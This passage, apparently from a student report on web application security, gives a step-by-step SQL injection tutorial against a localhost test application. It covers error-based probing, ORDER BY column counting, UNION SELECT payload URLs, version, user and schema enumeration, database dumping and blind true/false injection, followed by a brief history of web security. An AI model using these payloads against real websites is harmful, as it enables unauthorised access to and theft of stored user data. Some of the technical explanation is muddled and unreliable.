In a link of a website you may find that there is an "=" sign. In order to perform an SQL injection on website, you will need to type commands after the "=" sign. Simply start typing the commands after the equals sign and click "Go" in your web browser, as if you are going to a new website. The simplest way to understand what you need to do is to see an example attack broken down into steps(Palmer,2007).
Suppose we found a site which contain = sign mean it is database related website, now we need to determine if link is vulnerable. Let's say that we have some site like this
Now to test whether the link is vulnerable or not we need to add (Quote) ‘ to the end of URL. For example
If we get some error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." or something similar that means this site is vulnerable to SQL injection.
35 18.104.22.168Analyzing Errors
Every database has different syntax so you will receive different error message of each database. Below I have included some error message of some of database(Mirdula&Manivannan,2013).
Mysql error Access Error Oracle Error MSSQL Error "You have an
error in your SQL"
"Microsoft JET Database"
"Microsoft OLE DB Provider for SQL Server" "Microsoft OLE DB Provider for SQL Server" "Division by zero in" "ODBC Microsoft Access Driver"
"Microsoft OLE DB Provider for Oracle" "Unclosed quotation mark" "Supplied argument is not a valid MySQL result resource in" - "[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect" "[Microsoft][ODBC SQL Server Driver]" "Call to a member function"
If you are not receiving error like above then we must have to move to next link for test the vulnerability. So it is very time consuming process to first we have to collect each and every link of the web application and then we must have to test each link by the payload. If you have received penetration contract of any large web application then it may possible that it cannot complete the process in the limit of time(Mirdula&Manivannan,2013).
22.214.171.124 Gathering Information
Once attacker receive the information about the vulnerable web link he then start to perform the enumeration task of various database related information. Enumeration contain various operation such as null column analysis, database version enumeration, column enumeration etc… in this topic we will understand that how we can enumerate database if a web application suffer from SQLI bug(Antunes, Vieira,2009).
126.96.36.199Enumerating column length Mysql Database
As i know that from previous practical i received the SQL injectable URL so now i have vulnerable site, I am going one step up so i enumerate a website to find number of columns. For that i can use statement ORDER BY (tells database how to order the result).
http://localhost/bcs/admin/category_form.php?id=1+order+by+1--<-- no error http://localhost/bcs/admin/category_form.php?id=1+order+by+2--<-- no error http://localhost/bcs/admin/category_form.php?id=1+order+by+3--<--no error
http://localhost/bcs/admin/category_form.php?id=1+order+by+4--<-- error (I got message like this Unknown column '4' in 'order clause' or something like that)
In above example I have seen that i have received error at 4 it means that it has 3 columns, because I got an error on 4.
After getting injection point Now I need to check for UNION function with union I can select more data in one SQL statement(Messmer ,2008). So I can build the query as below:
http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3
Above URL may be called as exploitable URL.
188.8.131.52Null Column Analysis Manually
First of all I may add comment to behind the exploitable URL such as /* or --. http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3/*
NOTE: if /* not working or you get some error, then try -- for example http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3--
It's a comment and it's important for our query to work properly. Once i will execute above URL in the browser after i will able to see the numeric value in the browser let say that we
have number 2 on the screen. That means number 2 is my null column for this web link. I can exploit my sql commands through this column(Mcallister, Kirda& Kruegel,2008).
184.108.40.206Fetching Database Version Manually
For checking the version of the database I can simply use @@version or version () function to get the version of the database. As I discussed previous number 2 column is null column so, I can simply put this function instead of number two in our exploitable URL(Shar&Tan,2013).
I can see when I put my exploitable URL in to this web page we can get the version of the database. Its showing in the picture 5.6.16 is the version of the database.
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." then the convert (), hex () and unhex() function can be use(Easttom,2012).
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1, convert(@@version using latin1),3--
And you will get MySQL version of the database.
220.127.116.11Fetching Database name
To check for database name i can use the database () function for test this i need to replace the number 2 with database() and get something like similar to below image(Alanazi&Sarrab, 2011).
You can see from example I change the database () with column number 2. And I got the name of the database INFORMATION_SCHEMA.
18.104.22.168Fetching User information
To check for the information about which user is using this database I will replace the number 2 with user () and get something like bellow(Oehlert,2005):
You can see by applying user () I got the user name root@localhost that is using this database. This web application is running on local host server.
22.214.171.124Database, Table, and Column Enumeration
Once the database information enumeration complete successfully now the next step is to follow to get the list of database table and column name. In this topic i will understand that how i can enumerate the column and table name of the database if the web application is suffering the SQL injection vulnerability(Alanazi& Sarrab,2011).
Enumerating Table Name for mysql version <5:
Now, I get the version now we will enumerate the database column name and table for Getting table and column name well if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) we must guess table and column name in most cases. Common table names are: users, admin, and member... common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
Now suppose if the SQL version 5 i get then the above method will not work but i can use this method. For this we need database name which I already got by using database (). I can use this information_schema database to find its table names. To get tables we use tables_name and information_schema.column(Howard, LeBlanc&Viega,2010).
Here we replace the number 2 with tables_name to get the first table from information_schema.column displayed on the bellow screen.
You can see from example I got the name of the first table CHARACTER_SET which is in database Information_schema. We can add LIMIT to the end of query to list out all tables(Ringgold& Portland,2012).
126.96.36.199 Enumerating Column
Now, I want to get column name of particular databse.I will use column_name and information_schema.column functions to get that column name.
Here I replace the number 2 with column_name to get the first table from information_schema.column displayed on the bellow screen. We can add LIMIT to the end of query to list out all columns.
You can see from example by using that column_name function I got the name of the column which is in information_schemadatabse.
188.8.131.52 Dumping Database
The database dumping process can start only after once we receive the information of column. The next task of penetration tester is to enumerate the information inside the column of the table. Database hold all the information such as password and users’ information. The pen tester try to dump the database information using this techniques(Howard, LeBlanc& Viega,2010).
Now to check column names we can use the table name and the column name in the URL. Once we execute the URL as below defined we will receive the information which will exist in the defined column.
So, like that we can use this Mysql URL method to through the sql injection attack and as we see in example of the web application BCS PREDICTION how we can get the all database information by using sql injection method.
You can see in the above database I found the database name, table name, column name, and all information of the database by using Mysql URL method sql injection technique.
5.2.3 Sql Injection InMySqlBy Blind Injection Method:
Blind injection is a little more complicated then URL injection but it can be http://localhost/bcs/admin/category_form.php?id=1
in this time when we use above url the page will be load normally now let’s check it’s for vulnerable blind injection
184.108.40.206Vulnerability Checking In Blind Sql Injection
put 1=1 after the site. The page will be load normally because this condition will always true
45 Condition is true:
now change 1=1 to 1=2 this is false now see what happen.
So if some text, picture or some content is missing on returned page then that site is vulnerable to blind sql injection. We can see in below snap shot when condition is false “CATEGORY OF TYPE” became Category Title instead of “BEEF”.
Now if we find that the site is vulnerable of blind sql injection then Get the MySQL versionto get the version in blind attack we use sub string. We use true and false condition with version function to check whether the version of your database is 5 or 4.
220.127.116.11Getting Version InMysql Database
In blind sql injection the database version get by substring function and @@version
This should return TRUE if the version of MySQL is 5. If the database has version 5, than this condition will be true. So the page will load normally.
Replace 5 with 4, If the database has version 5 than this condition will be false.
And it will change some pictures or icons in the web page. We can see from below snap shot the Category of Title is changed.
47 18.104.22.168 Enumerating table name from the current database:
In Blind Injection we have to guess tables name with the condition. If the condition is true than page will load normally.
We will try with different table names:
48 2) Users
(We got an Error)
(Page will load normally, that means condition is true. Database has one table which name is “admin”.
49 22.214.171.124Enumerating Column Name:
now what we the same as table name, we start guessing. Like i said before try the common names for columns.
If the page loads normally we know that column name is Userid in Admin table (if we get false then try other common names or just guess). In below snap shot we can see we got an error that means there is no userid column in Admin table.
2) Admin_id For example
This page will load normally that means there is a column which name is admin_id in admin table.Like this with the using of Blind SQl injection techniques we dump the database.
6. History of web application security fields and practice
Web Application introduced in 1990, the web was a general, exiled delivery mechanism. It is transform from a for static hypertext documents to a complete dynamic run-time environment for multi-party and distributed applications. The web technologies have progressively transformed from a centralised server technology to an interaction models and dynamic client model. The emerging trend was popular in peer-to-peer web applications and multiple applications. But the transformation of the web application from the server-centric model creates a significant and numerous challenges in web applications security (Alanazi & Sarrab 2011). In the past decade it was not possible to make web application client centric. Thus it is work as motivation in the need for compact security of web application.
Figure- History of Web Application Development till Hacking Arrives (Owasp.org.au, 2015)
After the introduction of web server and browser, the continuous development is started. Hence it is a service of transformation, it security concerns starts with its progress. The year 1995, is the year of new achievements in the area of web development, lots of new things are discovered. In late, 1994 W3C introduced. PHP 1.0 and apache was introduced in 1995 (Alanazi & Sarrab 2011). Microsoft releases their software for web development named IIS and also internet explorer 1 is introduced. Java script and MySQL is discovered. Later on, these things upgraded with the time and new discoveries. There are some methodologies which are worked for the security of web application at initial level of the development
Fine-grained access control: These are the policies which define how the application authentication process goes and application authorizes end users. In the beginning of web application, security is simple from which web application frameworks checked, and the simple sequences maintain the application’s integrity. There was a series of questions from foundation for authentication process and protocols limits to the feasibilities of authentication such as secure session management (Alanazi & Sarrab 2011).
Information-flow control: It specifies the security of sensitive data, trust domains, data integration, and client-side and server-side information processing. Initially in web development, organisation’s policies are the base for the security policy of a web application. Information-flow policies involved individuals with possibly certain goals. That time tracking
First Web Server And Browser Intoduced W3C Php 1.0 & Apache Released, IIS 1.0 Released On Windows NT, Live (Java) Script, Mysql And IE1 Released OWASP Started, ASP.Net 1.0 Released, SQL Slammer Worm Started, Works Started On Html5 Samy Worm Released, AJAX Term Proposes, Web Vulnerability Scanner Introduced Web Application Hacking Arrives
end-to-end information and its flow in web applications could not be find out and is follow by end user review. Information-flow control policies are set of mechanisms practically implemented in a web setting.
Secure composition: In the starting, securities are applying in the code of web applications. In short, coding part solely responsible for the security of a web application. Traditional HTML fails to deliver both the interaction and security needs. Security is composition of interaction and separation.
The java script plays an important in securing the web application from its birth in web application development. This scripting language is formalizing its semantics. Now the HTML5 and CSP also come with lots of security features for various threats regarding to web application. (Desme and Johns, n.d.)
7. web security with software engineering with design
Most of the applications developed with the software engineering models that help in management of resources. Organisations are not fully aware about the fact of security issues which were not considered as a serious element in development life cycle.
The organisations manage security of application by separate processes to meet requirements. Meanwhile SDLC provides options for security of a application. The security service can be implementing with the phase of the development life cycle (Meier, 2006).